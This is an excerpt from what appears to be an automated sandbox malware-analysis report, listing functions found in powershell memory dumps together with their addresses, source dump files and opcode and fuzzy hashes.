                                                                • Opcode ID: 12741cc37ef9d15f31f5b1e4eefe5be34338e6554048a52fd94f1443cd8a29de
                                                                • Instruction ID: 2392f9a0e55b876393f5a6a1204423c754337e62e559ba8d9f6cd32d3297fafe
                                                                • Opcode Fuzzy Hash: 12741cc37ef9d15f31f5b1e4eefe5be34338e6554048a52fd94f1443cd8a29de
                                                                • Instruction Fuzzy Hash: FA21603170420A8BDB19B6A9E8111BAB799BBD5391F10847FD942C7342DB32C406C352
                                                                Function 09800F94 Relevance: .0, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1781120339.0000000009800000.00000040.00000800.00020000.00000000.sdmp, Offset: 09800000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_9800000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b3b98b8b93bef50424588ddf9d78d33e1dd04bd74c49470ef1a2d189b70a68f0
                                                                • Instruction ID: 9df8d82b328bba8dc27db650f7011a2ef0f0a47bc2f455e9b80e4ad1816113cc
                                                                • Opcode Fuzzy Hash: b3b98b8b93bef50424588ddf9d78d33e1dd04bd74c49470ef1a2d189b70a68f0
                                                                • Instruction Fuzzy Hash: 8011DA35A01209EFDB45CF94D894B9DBBB2BF88314F288158F404AB3A1C775A882CB50
                                                                Function 07AA4B85 Relevance: .0, Instructions: 26COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d170b00fbdb45d26af51912ff37b4da85d0cfe67283f3a6817e49cecc3532d50
                                                                • Instruction ID: 391474cfb4f0994193b980d15adcbbf7e20d395c44bc2982aabc31dfa20df221
                                                                • Opcode Fuzzy Hash: d170b00fbdb45d26af51912ff37b4da85d0cfe67283f3a6817e49cecc3532d50
                                                                • Instruction Fuzzy Hash: 9EF0ED7820D3C1AFC747CB68C894910BFB0AE8B12030C82CFE1A08F1A3C661A846DB42
                                                                Function 07AA4B41 Relevance: .0, Instructions: 18COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.1777062665.0000000007AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07AA0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7aa0000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8976a202426df3778afb18c3026b41cb255b94335666cb2b2c62db87895460c6
                                                                • Instruction ID: 01cbe3a5086d862f22586a38811cfb417905e261013ffe73f6d78f3c049b5885
                                                                • Opcode Fuzzy Hash: 8976a202426df3778afb18c3026b41cb255b94335666cb2b2c62db87895460c6
                                                                • Instruction Fuzzy Hash: 17D0A776704204EBD740D588EC50EA5F320E7D4321F14C1ABF2644B282DB629413CBC1